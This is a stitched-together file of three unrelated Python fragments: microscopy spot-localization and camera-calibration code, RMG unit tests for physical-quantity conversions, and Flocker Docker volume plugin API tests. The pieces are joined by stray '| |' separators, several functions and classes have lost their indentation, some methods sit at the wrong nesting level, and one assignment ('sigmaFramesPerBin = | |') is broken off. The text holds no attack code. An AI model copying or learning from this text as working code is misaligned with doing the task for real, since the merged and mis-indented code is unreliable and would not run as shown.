    """Load all ROI batches from ``rois_fn`` into single concatenated arrays."""
    infos, pixel_blocks = [], []
    for info, px in load_rois_iterator(rois_fn, maxrois):
        infos.append(info)
        pixel_blocks.append(px)
    return np.concatenate(infos), np.concatenate(pixel_blocks)
def extract_rois_iterator(movie, roipos, roiframe, calib, roisize,
        ctx:Context, minBatchSize):
    """
    Extract predefined ROIs from a TIFF or other image iterator.

    Args:
        movie: iterable of frames.
        roipos: Corner positions [[y,x]...]
        roiframe: frame index for each ROI.
        calib: camera calibration as created with create_calib_obj
        roisize: width/height of the square ROIs.
        ctx: photonpy Context.
        minBatchSize: yield results once at least this many are ready.

    Yields:
        (rois, frames) batches.

    TODO: Save to disk in batches to remove memory bottleneck
    """
    roilist = np.zeros(len(roipos),dtype=ROIExtractor.ROIType)
    roilist['cornerpos'] = roipos
    roilist['startframe'] = roiframe
    roilist['numframes'] = 1
    with Context(ctx.smlm) as ex_ctx:
        q = None
        numframes = 0
        for i,img in enumerate(movie):
            if i == 0:
                # The extractor needs the frame shape, so create it lazily.
                q = ROIExtractor(img.shape, roilist, 1, roisize, calib, ex_ctx)
            q.PushFrame(img)
            numframes += 1
            resultcount = q.GetResultCount()
            if resultcount > minBatchSize:
                rois,frames = q.GetResults(resultcount)
                yield rois,frames
        # All frames pushed: keep yielding batches while the queue drains,
        # then flush whatever is left.
        while not q.IsIdle():
            time.sleep(0.1)
            resultcount = q.GetResultCount()
            if resultcount > minBatchSize:
                rois,frames = q.GetResults(resultcount)
                yield rois,frames
        resultcount = q.GetResultCount()
        if resultcount>0:
            rois,frames = q.GetResults(resultcount)
            yield rois,frames
def localize_rois(rois_data_source, psf, initial_estim=None, constants=None, prog_cb=None, total=None):
    """
    Runs PSF centroid estimation on the given ROIs using the PSF.
    The PSF must be created with cuda=True

    rois_data_source can either be a file generated by detect_rois, or
    a tuple with the ROI data (rois_info, pixels)

    Args:
        initial_estim: optional initial parameter estimates in ROI order.
        constants: optional per-ROI constants passed to the estimator.
        prog_cb: optional callback(result_count) -> bool; returning a falsy
            value aborts the run.
        total: expected total ROI count, used for the progress bar.

    Returns:
        Queue results sorted back into original ROI order with ``ids``
        replaced by source frame numbers, or ``None`` if aborted.
    """
    if type(rois_data_source) == str:
        iterator = load_rois_iterator(rois_data_source)
    else:
        iterator = rois_data_source
    framenums = []
    with EstimQueue(psf,batchSize=1024) as queue, tqdm.tqdm(total=total) as pb:
        count = 0
        lastrc = 0
        def progupdate():
            # Advance the progress bar by newly finished results and give
            # the caller a chance to abort via prog_cb.
            nonlocal lastrc
            rc = queue.GetResultCount()
            progress = rc-lastrc
            pb.update(progress)
            lastrc = rc
            if prog_cb is None:
                return True
            return prog_cb(rc)
        for rois_info, pixels in iterator:
            roipos = np.zeros((len(rois_info),2))
            roipos[:,0] = rois_info['y']
            roipos[:,1] = rois_info['x']
            framenum = rois_info['id']
            framenums.append(framenum)
            if initial_estim is not None:
                initial = initial_estim[count:count+len(pixels)]
            else:
                initial = None
            if constants is not None:
                batch_constants = constants[count:count+len(pixels)]
            else:
                batch_constants = None
            # ids record the global ROI order so results can be re-sorted.
            queue.Schedule(pixels, ids=np.arange(count,count+len(pixels)), roipos=roipos, initial=initial, constants=batch_constants)
            count += len(pixels)
            if not progupdate():
                return None
        queue.Flush()
        while not queue.IsIdle():
            time.sleep(0.05)
            progupdate()
        progupdate()
        r = queue.GetResults(getSampleData=False)
        r.SortByID(isUnique=True) # reorder back to original ROI order
        r.ids = np.concatenate(framenums)
    return r
def create_calib_obj(gain,offset,imgshape,ctx):
    """Build a camera gain/offset calibration object.

    Args:
        gain: scalar gain, per-pixel gain image, or a filename of
            uniformly-lit calibration frames (in which case ``offset`` must
            be a dark-frame stack filename and both are estimated here).
        offset: scalar offset, per-pixel offset image, or dark-frames filename.
        imgshape: expected (height, width) of the movie frames.
        ctx: photonpy Context.

    Returns:
        GainOffsetImage_Calib when a per-pixel offset image is used,
        otherwise GainOffset_Calib.
    """
    if type(gain)==str:
        print(f'estimating gain from light {gain} and dark {offset} frames')
        light = tifffile.imread(gain)
        offset = tifffile.imread(offset)
        if not np.array_equal(imgshape, light.shape[1:]):
            raise ValueError(f'Camera light frames calibration data ({light.shape[1:]}) does not match with expected image size ({imgshape})')
        if not np.array_equal(imgshape, offset.shape[1:]):
            raise ValueError(f'Camera offset calibration ({offset.shape[1:]}) does not match with expected image size ({imgshape})')
        offset = np.mean(offset,0)
        # Photon-transfer estimate: per-pixel gain = variance / mean of the
        # offset-corrected signal over the frame axis.
        sig = light-offset
        v = np.var(sig, 0)
        m = np.mean(sig,0)
        gain = v/m
        gain[gain==0] = np.mean(gain)  # avoid zero gain at dead pixels
        print(f'mean camera gain: {np.mean(gain):.2f} ADU/photons offset: {np.mean(offset):.2f}',flush=True)
    if type(offset)==str:
        print(f'using mean values from {offset} as camera offset',flush=True)
        offset=tiff.get_tiff_mean(offset)
    if type(gain)!=str:
        # Broadcast a scalar (or per-pixel) gain to a full gain image.
        gain = np.ones(imgshape)*gain
    if( type(offset)==np.ndarray):
        # Per-pixel offset image -> image-based calibration object.
        calib = GainOffsetImage_Calib(gain, offset, ctx)
    else:
        calib = GainOffset_Calib(gain, offset, ctx)
    return calib
def _summed_movie(movie, sumframes):
img = None
f = 0
for m in movie:
if f == 0:
img = m.copy()
else:
img += m
f += 1
if f == sumframes:
img_ = img
img = None
f = 0
yield img_
class Localizer2D:
"""
Perform localization on a tiff with a 2D Gaussian PSF model
"""
def __init__(self):
    # No up-front state: everything is configured and computed in process().
    ...
def process(self, tiff_fn_or_iterator, cfg, output_file=None, progress_cb=None, cache_dir=None):
    """Run the full 2D Gaussian localization pipeline on a movie.

    Stages: spot detection -> XYIBg fit with the approximate sigma ->
    XYIBgSigmaXY fit -> per-frame median sigma interpolated with splines
    (to follow Z drift) -> final XYIBg fit with interpolated sigmas ->
    border and (optional) chi-square filtering.

    Args:
        tiff_fn_or_iterator: TIFF filename or an iterable of frames.
        cfg: dict with keys 'roisize', 'threshold', 'gain', 'offset',
            'spotdetectsigma' and optional 'startframe', 'maxframes',
            'sumframes', 'maxchisq', 'sigmaframesperbin', 'fov_offsets',
            'tilted_bg'.
        output_file: optional path to save the resulting Dataset.
        progress_cb: optional callback(text, progress) -> bool; a falsy
            return aborts processing (this method then returns None).
        cache_dir: optional directory for the intermediate ROI file.

    Returns:
        The filtered Dataset, or None when aborted via progress_cb.
    """
    self.cfg=cfg
    roisize = cfg['roisize']
    threshold = cfg['threshold']
    gain = cfg['gain']
    offset = cfg['offset']
    startframe = cfg['startframe'] if 'startframe' in cfg else 0
    maxframes = cfg['maxframes'] if 'maxframes' in cfg else -1
    sumframes = cfg['sumframes'] if 'sumframes' in cfg else 1
    maxChiSquare = cfg['maxchisq'] if 'maxchisq' in cfg else None
    if maxChiSquare is not None and maxChiSquare == 0:
        # A zero threshold means "no chi-square filtering".
        maxChiSquare = None
    sigmaFramesPerBin = cfg['sigmaframesperbin'] if 'sigmaframesperbin' in cfg else None
    spotDetectSigma = cfg['spotdetectsigma']
    fovOffsets = cfg['fov_offsets'] if 'fov_offsets' in cfg else None
    useTiltedBg = cfg['tilted_bg'] if 'tilted_bg' in cfg else None
    abort=False
    def progcb(txt,prog):
        # Wrap the user callback; remember an abort request.
        nonlocal abort
        if progress_cb is not None:
            r = progress_cb(txt,prog)
            if not r:
                abort=True
            return r
        return True
    with Context() as ctx:
        gaussian = GaussianPSFMethods(ctx)
        if type(tiff_fn_or_iterator) == str:
            movie = tiff.tiff_read_file(tiff_fn_or_iterator, startframe, maxframes, progress_cb)
            if sumframes > 1:
                movie = _summed_movie(movie, sumframes)
                # Summing frames scales the camera offset accordingly.
                offset *= sumframes
        else:
            movie = tiff_fn_or_iterator
        if output_file is not None:
            rois_output_fn = os.path.splitext(output_file)[0]+"_rois.npy"
        else:
            rois_output_fn = os.path.splitext(tiff_fn_or_iterator)[0]+"_rois.npy"
        if cache_dir is not None:
            rois_output_fn = cache_dir + os.path.split(os.path.splitext(output_file)[0]+"_rois.npy")[1]
        self.rois_output_fn = rois_output_fn
        # Peek at the first frame to learn the image shape without
        # consuming the iterator.
        first_image, movie = peek_first(movie)
        imgshape = first_image.shape
        spotDetector = spotdetect.SpotDetector(spotDetectSigma, roisize, threshold)
        calib = create_calib_obj(gain,offset,imgshape,ctx)
        numrois,_ = detect_spots(spotDetector, calib, movie, 1, rois_output_fn, batch_size=20000, ctx=ctx)
        if numrois == 0:
            raise ValueError('No spots found')
        # Pass 1: XYIBg fit with the approximate spot-detection sigma.
        psf = gaussian.CreatePSF_XYIBg(roisize, spotDetectSigma, True)
        prog_cb = lambda cur: progress_cb(f'Fitting 2D Gaussian with approx. PSF sigma. ({cur}/{numrois})', cur/numrois)
        if progress_cb is None:
            prog_cb = None
        qr = localize_rois(rois_output_fn, psf, prog_cb=prog_cb, total=numrois)
        if qr is None:
            return
        framenum = qr.ids
        # Re-estimate including sigma (x,y) fits
        estim = np.zeros((len(qr.estim), 6))
        estim[:,:4] = qr.estim
        estim[:,4:] = spotDetectSigma
        psf_sigma = gaussian.CreatePSF_XYIBgSigmaXY(roisize, spotDetectSigma, True)
        prog_cb = lambda cur: progress_cb(f'Fitting 2D Gaussian including PSF sigma. ({cur}/{numrois})', cur/numrois)
        if progress_cb is None:
            prog_cb = None
        qr_sigma = localize_rois(rois_output_fn, psf_sigma, initial_estim=estim, prog_cb=prog_cb, total=numrois)
        if qr_sigma is None:
            return
        # Estimate per-frame sigma and interpolate using splines to account for Z drift
        ds = Dataset.fromQueueResults(qr_sigma, imgshape)
        self.ds_sigma_fits = ds
        if len(ds) == 0:
            raise ValueError('PSF Sigma fits failed')
        numframes = np.max(framenum)+1
        # Bin frames for a robust median-sigma estimate per bin.
        ds.data.frame = np.maximum((ds.data.frame / sigmaFramesPerBin - 0.5).astype(np.int32),0)
        frames = ds.indicesPerFrame()
        self.medianSigma = np.array([np.median(ds.data.estim.sigma[idx],0) for idx in frames])
        self.sigma_t = (0.5+np.arange(len(frames))) * sigmaFramesPerBin
        #self.medianSigma = [self.medianSigma[0], *self.medianSigma, self.medianSigma[-1]]
        # Clamp the spline knots to the full frame range.
        self.sigma_t[0] = 0
        self.sigma_t[-1] = (len(frames)-1) * sigmaFramesPerBin
        spl_x = InterpolatedUnivariateSpline(self.sigma_t, self.medianSigma[:,0], k=2)
        spl_y = InterpolatedUnivariateSpline(self.sigma_t, self.medianSigma[:,1], k=2)
        self.sigma = np.zeros((numframes,2))
        self.sigma[:,0] = spl_x(np.arange(numframes))
        self.sigma[:,1] = spl_y(np.arange(numframes))
        # Re-estimate using known sigmas
        psf = gaussian.CreatePSF_XYIBg(roisize, sigma=None, cuda=True)
        roi_sigmas = self.sigma[framenum]
        prog_cb = lambda cur: progress_cb(f'Fitting 2D Gaussian using interpolated PSF sigma. ({cur}/{numrois})', cur/numrois)
        if progress_cb is None:
            prog_cb = None
        r = localize_rois(rois_output_fn, psf, constants=roi_sigmas, prog_cb=prog_cb, total=numrois)
        if r is None:
            return
        ds = Dataset.fromQueueResults(r, imgshape, config=cfg, sigma=self.sigma)
        if type(tiff_fn_or_iterator) == str:
            ds['imagefile'] = tiff_fn_or_iterator
        print('Filtering hitting ROI border')
        # Drop fits whose center is within borderxy pixels of the ROI edge.
        borderxy = 2.5
        lpos = ds.local_pos
        ds.filter((lpos[:,0] > borderxy) & (lpos[:,1] > borderxy) &
            (lpos[:,0] < roisize-borderxy-1) & (lpos[:,1] < roisize-borderxy-1))
        self.unfilteredChisq = ds.chisq*1
        if maxChiSquare is not None:
            print(f"Filtering on chi-square at threshold {maxChiSquare}*{roisize*roisize}...")
            self.chiSqThreshold = maxChiSquare*roisize**2
            ds.filter(ds.chisq<self.chiSqThreshold)
        else:
            self.chiSqThreshold = None
        nframes = ds.numFrames
        print(f"Num spots: {len(ds)}. {len(r.estim) / nframes} spots/frame.")
        if output_file is not None:
            ds.save(output_file)
        self.result=ds
        ds.config['locs_path'] = output_file
        return ds
    def plotSigmaFits(self):
        """Plot a histogram of the per-spot fitted PSF sigma X/Y values."""
        # NOTE(review): this reads self.result, which holds the final fit made
        # with a fixed-sigma PSF; the sigma estimates were produced into
        # self.ds_sigma_fits — confirm which dataset actually carries an
        # 'estim.sigma' field here.
        plt.figure()
        plt.hist(self.result.data.estim.sigma.T, bins=100,label=['Sigma X', 'Sigma Y'])
        plt.legend()
    def plotChiSquare(self):
        """Histogram the pre-filter chi-square values of all localizations."""
        plt.figure()
        # Clip the histogram range at 4x the median so outliers don't flatten it.
        m = np.median(self.unfilteredChisq) * 4
        plt.hist(self.unfilteredChisq, bins=100, range=[0,m], label='Chi-square values')
        # The threshold is only set when maxChiSquare filtering was requested.
        if self.chiSqThreshold is not None:
            plt.axvline(self.chiSqThreshold, label='Threshold')
        plt.legend()
        plt.xlabel('Chi-square value (sum((data-model)^2/model)')
def plotSigmaTimeSeries(self, **figargs):
sigmaFramesPerBin = | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# #
# RMG - Reaction Mechanism Generator #
# #
# Copyright (c) 2002-2019 Prof. <NAME> (<EMAIL>), #
# Prof. <NAME> (<EMAIL>) and the RMG Team (<EMAIL>) #
# #
# Permission is hereby granted, free of charge, to any person obtaining a #
# copy of this software and associated documentation files (the 'Software'), #
# to deal in the Software without restriction, including without limitation #
# the rights to use, copy, modify, merge, publish, distribute, sublicense, #
# and/or sell copies of the Software, and to permit persons to whom the #
# Software is furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in #
# all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER #
# DEALINGS IN THE SOFTWARE. #
# #
###############################################################################
"""
This script contains unit tests of the :mod:`rmgpy.quantity` module.
"""
import unittest
import numpy
import rmgpy.constants as constants
import rmgpy.quantity as quantity
################################################################################
class TestAcceleration(unittest.TestCase):
    """
    Contains unit tests of the Acceleration unit type object.
    """

    def test_mpers2(self):
        """
        Test the creation of an acceleration quantity with units of m/s^2.
        """
        acc = quantity.Acceleration(1.0, "m/s^2")
        self.assertEqual(acc.units, "m/s^2")
        self.assertAlmostEqual(acc.value, 1.0, 6)
        self.assertAlmostEqual(acc.value_si, 1.0, delta=1e-6)

    def test_cmpers2(self):
        """
        Test the creation of an acceleration quantity with units of cm/s^2.
        """
        # 1 cm/s^2 == 0.01 m/s^2 in SI.
        acc = quantity.Acceleration(1.0, "cm/s^2")
        self.assertEqual(acc.units, "cm/s^2")
        self.assertAlmostEqual(acc.value, 1.0, 6)
        self.assertAlmostEqual(acc.value_si, 0.01, delta=1e-8)
################################################################################
class TestArea(unittest.TestCase):
    """
    Contains unit tests of the Area unit type object.
    """

    def test_m2(self):
        """
        Test the creation of an area quantity with units of m^2.
        """
        q = quantity.Area(1.0, "m^2")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
        self.assertEqual(q.units, "m^2")

    def test_cm2(self):
        """
        Test the creation of an area quantity with units of cm^2.
        """
        # 1 cm^2 == 1e-4 m^2; the SI value must reflect the conversion.
        q = quantity.Area(1.0, "cm^2")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si, 1.0e-4, delta=1e-10)
        self.assertEqual(q.units, "cm^2")
################################################################################
class TestConcentration(unittest.TestCase):
    """
    Contains unit tests of the Concentration unit type object.
    """

    def test_perm3(self):
        """
        Test that creating a concentration quantity with units of m^-3 fails.
        """
        # A bare number-density unit is rejected with a QuantityError;
        # assertRaises replaces the older try/self.fail/except pattern.
        with self.assertRaises(quantity.QuantityError):
            quantity.Concentration(1.0, "m^-3")

    def test_molperm3(self):
        """
        Test the creation of a concentration quantity with units of mol/m^3.
        """
        q = quantity.Concentration(1.0, "mol/m^3")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
        self.assertEqual(q.units, "mol/m^3")

    def test_moleculesperm3(self):
        """
        Test the creation of a concentration quantity with units of
        molecules/m^3.
        """
        # value_si * Na recovering 1.0 shows molecule counts are stored
        # divided by Avogadro's number internally.
        q = quantity.Concentration(1.0, "molecules/m^3")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si * constants.Na, 1.0, delta=1e-6)
        self.assertEqual(q.units, "molecules/m^3")
################################################################################
class TestEnergy(unittest.TestCase):
    """
    Contains unit tests of the Energy unit type object.
    """

    def test_J(self):
        """
        Test that creating an energy quantity with units of J fails.
        """
        # Energy must be a molar quantity (J/mol); per-system units are
        # rejected. assertRaises replaces the try/self.fail/except pattern.
        with self.assertRaises(quantity.QuantityError):
            quantity.Energy(1.0, "J")

    def test_Jpermol(self):
        """
        Test the creation of an energy quantity with units of J/mol.
        """
        q = quantity.Energy(1.0, "J/mol")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
        self.assertEqual(q.units, "J/mol")

    def test_cal(self):
        """
        Test that creating an energy quantity with units of cal fails.
        """
        with self.assertRaises(quantity.QuantityError):
            quantity.Energy(1.0, "cal")

    def test_calpermol(self):
        """
        Test the creation of an energy quantity with units of cal/mol.
        """
        # 1 cal == 4.184 J (thermochemical calorie).
        q = quantity.Energy(1.0, "cal/mol")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si, 4.184, delta=1e-6)
        self.assertEqual(q.units, "cal/mol")

    def test_kJ(self):
        """
        Test that creating an energy quantity with units of kJ fails.
        """
        with self.assertRaises(quantity.QuantityError):
            quantity.Energy(1.0, "kJ")

    def test_kJpermol(self):
        """
        Test the creation of an energy quantity with units of kJ/mol.
        """
        q = quantity.Energy(1.0, "kJ/mol")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si, 1000., delta=1e-6)
        self.assertEqual(q.units, "kJ/mol")

    def test_kcal(self):
        """
        Test that creating an energy quantity with units of kcal fails.
        """
        with self.assertRaises(quantity.QuantityError):
            quantity.Energy(1.0, "kcal")

    def test_kcalpermol(self):
        """
        Test the creation of an energy quantity with units of kcal/mol.
        """
        q = quantity.Energy(1.0, "kcal/mol")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si, 4184., delta=1e-6)
        self.assertEqual(q.units, "kcal/mol")

    def test_Kelvin(self):
        """
        Test the creation of an energy quantity with units of K (not really an
        energy!).
        """
        # Temperatures are converted by multiplying with the molar gas
        # constant (8.314472 J/(mol*K)) and stored as J/mol.
        q = quantity.Energy(10.0, "K")
        self.assertAlmostEqual(q.value, 10 * 8.314472, delta=1e-6)
        self.assertEqual(q.units, "J/mol")
################################################################################
class TestDipoleMoment(unittest.TestCase):
    """
    Contains unit tests of the DipoleMoment unit type object.
    """

    def test_Ctimesm(self):
        """
        Test the creation of a dipole moment quantity with units of C*m.
        """
        q = quantity.DipoleMoment(1.0, "C*m")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si, 1.0, 6)
        self.assertEqual(q.units, "C*m")

    def test_D(self):
        """
        Test the creation of a dipole moment quantity with units of De (debye).
        """
        # The original docstring wrongly said "units of J/mol" (copy-paste
        # from the energy tests). The SI check multiplies by c*1e21 to undo
        # the debye -> C*m conversion and recover 1.
        q = quantity.DipoleMoment(1.0, "De")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si * constants.c * 1.0e21, 1.0, 6)
        self.assertEqual(q.units, "De")
################################################################################
class TestFlux(unittest.TestCase):
    """
    Contains unit tests of the Flux unit type object.
    """

    def test_perm2pers(self):
        """
        Test that creating a flux quantity with units of m^-2*s^-1 fails.
        """
        # A bare per-area-per-time unit (no mol/molecules) is rejected with
        # a QuantityError; assertRaises replaces try/self.fail/except.
        with self.assertRaises(quantity.QuantityError):
            quantity.Flux(1.0, "m^-2*s^-1")

    def test_molperm3(self):
        """
        Test the creation of a flux quantity with units of mol/(m^2*s).
        """
        q = quantity.Flux(1.0, "mol/(m^2*s)")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
        self.assertEqual(q.units, "mol/(m^2*s)")

    def test_moleculesperm3(self):
        """
        Test the creation of a flux quantity with units of molecules/(m^2*s).
        """
        # value_si * Na recovering 1.0 shows molecule-based fluxes are stored
        # divided by Avogadro's number internally.
        q = quantity.Flux(1.0, "molecules/(m^2*s)")
        self.assertAlmostEqual(q.value, 1.0, 6)
        self.assertAlmostEqual(q.value_si * constants.Na, 1.0, delta=1e-6)
        self.assertEqual(q.units, "molecules/(m^2*s)")
################################################################################
class TestForce(unittest.TestCase):
    """
    Contains unit tests of the Force unit type object.
    """

    def test_N(self):
        """
        Test the creation of a force quantity with units of N.
        """
        force = quantity.Force(1.0, "N")
        self.assertEqual(force.units, "N")
        self.assertAlmostEqual(force.value, 1.0, 6)
        self.assertAlmostEqual(force.value_si, 1.0, delta=1e-6)
################################################################################
class TestFrequency(unittest.TestCase):
    """
    Contains unit tests of the Frequency unit type object. Note that, as a
    special case, frequencies can be read in several units, but are always
    stored internally as cm^-1.
    """

    def _check_frequency(self, units, expected, delta):
        """
        Create a Frequency of 1.0 in the given ``units`` and assert that both
        the displayed value and the SI value equal ``expected`` (in cm^-1,
        within ``delta``), and that the stored units are normalized to cm^-1.

        Factors out the identical body of all eight unit tests below.
        """
        q = quantity.Frequency(1.0, units)
        self.assertAlmostEqual(q.value, expected, delta=delta)
        self.assertAlmostEqual(q.value_si, expected, delta=delta)
        self.assertEqual(q.units, "cm^-1")

    def test_cm_1(self):
        """
        Test the creation of a frequency quantity with units of cm^-1.
        """
        self._check_frequency("cm^-1", 1.0, 1e-6)

    def test_s_1(self):
        """
        Test the creation of a frequency quantity with units of s^-1.
        """
        # Conversion divides by c in cm/s.
        self._check_frequency("s^-1", 1. / (constants.c * 100.), 1e-17)

    def test_K(self):
        """
        Test the creation of a frequency quantity with units of K.
        """
        self._check_frequency(
            "K", constants.kB / (constants.h * constants.c * 100.), 1e-6)

    def test_eV(self):
        """
        Test the creation of a frequency quantity with units of eV.
        """
        self._check_frequency(
            "eV", constants.e / (constants.h * constants.c * 100.), 1e-2)

    def test_Hz(self):
        """
        Test the creation of a frequency quantity with units of Hz.
        """
        self._check_frequency("Hz", 1. / (constants.c * 100.), 1e-17)

    def test_kHz(self):
        """
        Test the creation of a frequency quantity with units of kHz.
        """
        self._check_frequency("kHz", 1e3 / (constants.c * 100.), 1e-14)

    def test_MHz(self):
        """
        Test the creation of a frequency quantity with units of MHz.
        """
        self._check_frequency("MHz", 1e6 / (constants.c * 100.), 1e-11)

    def test_GHz(self):
        """
        Test the creation of a frequency quantity with units of GHz.
        """
        self._check_frequency("GHz", 1e9 / (constants.c * 100.), 1e-08)
################################################################################
class TestHeatCapacity(unittest.TestCase):
"""
Contains unit tests of the HeatCapacity unit type object.
"""
def test_JperK(self):
"""
Test the creation of a heat capacity quantity with units of J/K.
"""
try:
q = quantity.HeatCapacity(1.0,"J/K")
self.fail('Allowed invalid unit type "J/K".')
except quantity.QuantityError:
pass
def test_JpermolperK(self):
"""
Test the creation of a heat capacity quantity with units of J/(mol*K).
"""
q = quantity.HeatCapacity(1.0,"J/(mol*K)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "J/(mol*K)")
def test_calperK(self):
"""
Test the creation of a heat capacity quantity with units of cal/K.
"""
try:
q = quantity.HeatCapacity(1.0,"cal/K")
self.fail('Allowed invalid unit type "cal/K".')
except quantity.QuantityError:
pass
def test_calpermolperK(self):
"""
Test the creation of a heat capacity quantity with units of cal/(mol*K).
"""
q = quantity.HeatCapacity(1.0,"cal/(mol*K)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 4.184, delta=1e-6)
self.assertEqual(q.units, "cal/(mol*K)")
def test_kJperK(self):
"""
Test the creation of a heat capacity quantity with units of kJ/K.
"""
| |
# Copyright ClusterHQ Inc. See LICENSE file for details.
"""
Tests for the Volumes Plugin API provided by the plugin.
"""
import random
from uuid import uuid4
from bitmath import TiB, GiB, MiB, KiB, Byte
from twisted.web.http import OK, NOT_ALLOWED, NOT_FOUND
from twisted.internet.task import Clock, LoopingCall
from twisted.internet.defer import gatherResults
from hypothesis import given
from hypothesis.strategies import (
sampled_from, builds, integers
)
from pyrsistent import pmap
from eliot.testing import capture_logging
from .._api import VolumePlugin, DEFAULT_SIZE, parse_num, NAME_FIELD
from ...apiclient import FakeFlockerClient, Dataset, DatasetsConfiguration
from ...testtools import CustomException, random_name
from ...restapi import make_bad_request
from ...restapi.testtools import (
build_UNIX_integration_tests, APIAssertionsMixin,
)
# A Hypothesis strategy for generating volume size unit suffixes.
# Only gigabyte-style spellings are covered: KiB/MiB are too small and
# TiB too large to make useful test sizes.
# NOTE(review): b"".join over a single sampled string re-joins its
# characters with an empty separator, returning it unchanged (Python 2
# str semantics) — the lambda is effectively an identity mapping.
volume_expression = builds(
    lambda expression: b"".join(expression),
    expression=sampled_from([u"GB", "gib", "G", "Gb", "gb", "Gib", "g"]),
)
class SimpleCountingProxy(object):
    """
    Transparent proxy that records how many times each method of the
    wrapped object has been invoked.

    :ivar _wrapped: The object being proxied.
    :ivar call_count: Persistent mapping of method name to call count.
    """
    def __init__(self, wrapped):
        self._wrapped = wrapped
        self.call_count = pmap()

    def num_calls(self, name):
        """
        Look up how often the named method has been called so far.

        :param name: Method name.
        :return: Number of calls.
        """
        return self.call_count.get(name, 0)

    def __getattr__(self, name):
        # Only attributes not found on the proxy itself arrive here, so the
        # wrapped object's methods are resolved and wrapped on demand.
        target = getattr(self._wrapped, name)

        def counting_wrapper(*args, **kwargs):
            updated = self.call_count.get(name, 0) + 1
            self.call_count = self.call_count.set(name, updated)
            return target(*args, **kwargs)
        return counting_wrapper
class APITestsMixin(APIAssertionsMixin):
"""
Helpers for writing tests for the Docker Volume Plugin API.
"""
NODE_A = uuid4()
NODE_B = uuid4()
    def initialize(self):
        """
        Create initial objects for the ``VolumePlugin``.
        """
        # A fake clock lets individual tests advance time deterministically.
        self.volume_plugin_reactor = Clock()
        # Wrap the fake Flocker client so tests can count API calls.
        self.flocker_client = SimpleCountingProxy(FakeFlockerClient())
        # The conditional_create operation used by the plugin relies on
        # the passage of time... so make sure time passes! We still use a
        # fake clock since some tests want to skip ahead.
        self.looping = LoopingCall(
            lambda: self.volume_plugin_reactor.advance(0.001))
        self.looping.start(0.001)
        self.addCleanup(self.looping.stop)
    def test_pluginactivate(self):
        """
        ``/Plugin.Activate`` indicates the plugin is a volume driver.
        """
        # Docker 1.8, at least, sends "null" as the body. Our test
        # infrastructure has the opposite bug so just going to send some
        # other garbage as the body (12345) to demonstrate that it's
        # ignored as per the spec which declares no body.
        return self.assertResult(b"POST", b"/Plugin.Activate", 12345, OK,
                                 {u"Implements": [u"VolumeDriver"]})
    def test_remove(self):
        """
        ``/VolumeDriver.Remove`` returns a successful result.
        """
        # The endpoint only has to acknowledge with an empty ``Err`` string.
        return self.assertResult(b"POST", b"/VolumeDriver.Remove",
                                 {u"Name": u"vol"}, OK, {u"Err": u""})
def test_unmount(self):
"""
``/VolumeDriver.Unmount`` returns a successful result.
"""
unmount_id = ''.join(random.choice(
'0123456789abcdef') for n in xrange(64))
return self.assertResult(b"POST", b"/VolumeDriver.Unmount",
{u"Name": u"vol",
u"ID": unicode(unmount_id)},
OK, {u"Err": u""})
    def test_unmount_no_id(self):
        """
        ``/VolumeDriver.Unmount`` returns a successful result.

        No ID is sent, for backward compatibility with Docker < 1.12.
        """
        return self.assertResult(b"POST", b"/VolumeDriver.Unmount",
                                 {u"Name": u"vol"},
                                 OK, {u"Err": u""})
    def test_create_with_profile(self):
        """
        Calling the ``/VolumeDriver.Create`` API with an ``Opts`` value
        of "profile=[gold,silver,bronze]" in the request body JSON creates a
        volume with a given name with [gold,silver,bronze] profile.
        """
        # .example() draws a single sample outside @given; adequate here
        # since any valid profile value exercises the code path.
        profile = sampled_from(["gold", "silver", "bronze"]).example()
        name = random_name(self)
        d = self.assertResult(b"POST", b"/VolumeDriver.Create",
                              {u"Name": name, 'Opts': {u"profile": profile}},
                              OK, {u"Err": u""})
        # The created dataset must carry the profile in its metadata.
        d.addCallback(
            lambda _: self.flocker_client.list_datasets_configuration())
        d.addCallback(list)
        d.addCallback(lambda result:
                      self.assertItemsEqual(
                          result, [
                              Dataset(dataset_id=result[0].dataset_id,
                                      primary=self.NODE_A,
                                      maximum_size=int(DEFAULT_SIZE.to_Byte()),
                                      metadata={NAME_FIELD: name,
                                                u"clusterhq:flocker:profile":
                                                    unicode(profile)})]))
        return d
def test_create_with_size(self):
"""
Calling the ``/VolumerDriver.Create`` API with an ``Opts`` value
of "size=<somesize> in the request body JSON create a volume
with a given name and random size between 1-100G
"""
name = random_name(self)
size = integers(min_value=1, max_value=75).example()
expression = volume_expression.example()
size_opt = "".join(str(size))+expression
